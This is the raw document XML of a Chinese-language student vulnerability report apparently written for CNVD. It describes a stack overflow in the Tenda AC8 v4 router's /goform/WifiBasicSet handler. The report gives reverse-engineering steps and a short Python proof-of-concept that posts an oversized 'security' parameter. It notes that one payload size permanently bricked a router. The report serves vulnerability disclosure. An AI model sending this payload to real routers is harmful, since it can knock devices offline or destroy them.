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100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>腾达AC8 v4 V16.03.34.06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 漏洞报告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在校学生，第一次挖漏洞&amp;交cnvd，写的不到位的地方还希望审报告的师傅能够及时指正，拜谢Orz（联系邮箱：2313696342@qq.com</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体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检索了cve关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>AC8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系列的47个漏洞，确定没有重复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B0B0B0" w:sz="16" w:space="38"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u0e7ec52e"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用的环境&amp;工具版本号：Ubuntu 22.04</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B0B0B0" w:sz="16" w:space="38"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u6faaad00"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>binwalk v2.2.1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B0B0B0" w:sz="16" w:space="38"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u5ee72ca2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ida pro 9.0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="OJp1Q"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>环境准备</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="udc813782"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>官网下载对应路由器版本的固件：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://tenda.com.cn/material/show/103518"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2"/>
        </w:rPr>
        <w:t>https://tenda.com.cn/material/show/3518</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22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33336"/>
        </w:rPr>
        <w:t>AC8 v4 升级软件_V16.03.34.06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737373"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>软件版本：V16.03.34.06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737373"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>更新时间：2024-11-29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737373"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>文件大小 ： 6.86 M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宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="737373"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>文件格式： zip</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="ufc6eb652"/>
      <w:bookmarkStart w:id="6" w:name="ud953f2d1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="2663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3867" cy="75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宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>解压下载的zip文件后，使用binwalk工具来解析固件。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="ubbf776c1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>binwalk -eM 解析固件【最新版本的binwalk对该附件解析效果不好，我使用的是v2.2.1版本】</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="u8bf9d27f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正常解析后，来到squashfs-root目录下，路由器启动程序路径是./bin/httpd</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="u3d8d0d98"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通过file命令，查看程序，可以看到httpd是32-bit，MIPS架构的可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u9ca4924d"/>
      <w:bookmarkStart w:id="11" w:name="u45353898"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="741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8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11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="210" w:beforeAutospacing="0" w:after="50" w:afterAutospacing="0" w:line="320" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="ubd1f14b3"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞证明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在/goform/WifiBasicSet下，security和security_5g参数会导致栈溢出漏洞。</w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="OLE_LINK1"/>
      <w:r>
        <w:t>formWifiBasicSet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:t>函数的sub_45F3E8依次经过下面的函数，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sub_45F3E8 -&gt; sub_45E1C4 -&gt; sub_45DC58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在sub_45DC58的第30行的strcpy函数会导致栈溢出漏洞。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6212840" cy="5495290"/>
            <wp:effectExtent l="0" t="0" r="10160" b="381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549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在不设置其他参数的情况下，其余参数会保持默认，那么程序将在sub_45DC58函数中，会让我们传入参数security，攻击者通过输入足够长度的数据给这个参数，会使得程序在执行到strcpy函数时造成缓冲区溢出。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下面是在真实场景下的poc【qemu的虚拟环境，可能由于有些文件没有设置好权限，也可能是这样的原因：connect: No such file or directory，使得暂时没有找到一个办法在qemu的虚拟环境下使程序运行到sub_45DC58函数，但通过代码审计和真实场景的测试，可以确定，此处是存在栈溢出漏洞的】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POC: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bookmarkStart w:id="14" w:name="OLE_LINK2"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>import requests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>headers =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 xml:space="preserve">    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0',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 xml:space="preserve">    "Cookie" : "password=381acc5cfbc629c40245413ef90a4439mffcvb"   # 如果路由器设置了密码，需要抓包找到cookie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>url = "http://tendawifi.com"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>url_vuln = url + "</w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="OLE_LINK3"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>/goform/WifiBasicSet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9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># payload = 'a'*0x100  # 恰好不会触发栈溢出，路由器将继续正常运行，不会退出到登录页面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># payload = 'a'*(0x100+8)   # 不建议用这个payload，真实场景会报销路由器（我的路由器真的坏了）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>payload = 'a'*0x1000  # 真实场景，http://tendawifi.com管理界面会回到登录页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>data = {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 xml:space="preserve">    'security': payload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 xml:space="preserve">          }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rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>response = requests.post(url_vuln, data=data, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="E8E8E8" w:sz="4" w:space="8"/>
          <w:left w:val="single" w:color="E8E8E8" w:sz="4" w:space="8"/>
          <w:bottom w:val="single" w:color="E8E8E8" w:sz="4" w:space="8"/>
          <w:right w:val="single" w:color="E8E8E8" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="F9F9F9"/>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="595959"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/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当使用payload = 'a'*0x100时：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979795" cy="436880"/>
            <wp:effectExtent l="0" t="0" r="1905" b="762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当使用payload = 'a'*0x1000时：【不会影响到其他设备连接到路由器】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752465" cy="5203190"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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520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当使用payload = 'a'*(0x100+8)时：【此时路由器会因为程序卡死而直接掉线，就再也连不了，重启也不能连上路由器，之后联系客服，客服鉴定为路由器坏了】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除了会出现和payload = 'a'*0x1000时的程序报错以外，路由器还会直接将所有设备下线。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688965" cy="2820670"/>
            <wp:effectExtent l="0" t="0" r="635" b="1143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100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="12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commondata" w:val="eyJoZGlkIjoiZWQ0N2M3MGMzZTkxMWQ3N2QzOWUwY2ZlZDUyZjlkN2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0D4B23B2"/>
    <w:rsid w:val="16756B1B"/>
    <w:rsid w:val="259E471D"/>
    <w:rsid w:val="3F5D5C15"/>
    <w:rsid w:val="46714108"/>
    <w:rsid w:val="5C9D050E"/>
    <w:rsid w:val="5E5C08D3"/>
    <w:rsid w:val="72317CCF"/>
    <w:rsid w:val="79B34A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autoRedefine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22"/>
    <w:autoRedefine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3"/>
    <w:autoRedefine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4"/>
    <w:autoRedefine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autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8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20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5"/>
    <w:autoRedefine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13">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="26"/>
    <w:autoRedefine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5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="14"/>
    <w:autoRedefine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Emphasis"/>
    <w:basedOn w:val="16"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="18">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="16"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="19">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="16"/>
    <w:autoRedefine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Header Char"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="9"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="2"/>
    <w:autoRedefine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22">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="16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3">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="16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4">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="5"/>
    <w:autoRedefine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5">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="10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6">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="13"/>
    <w:autoRedefine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7">
    <w:name w:val="_Style 23"/>
    <w:autoRedefine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2025-06-12T12:46:00Z</dcterms:created>
  <dc:creator>胡j</dc:creator>
  <cp:lastModifiedBy>restart</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-19T14:44:57Z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75DF4531FD5C4BD094B5A43E09DCD011_12</vt:lpwstr>
  </property>
</Properties>
</file>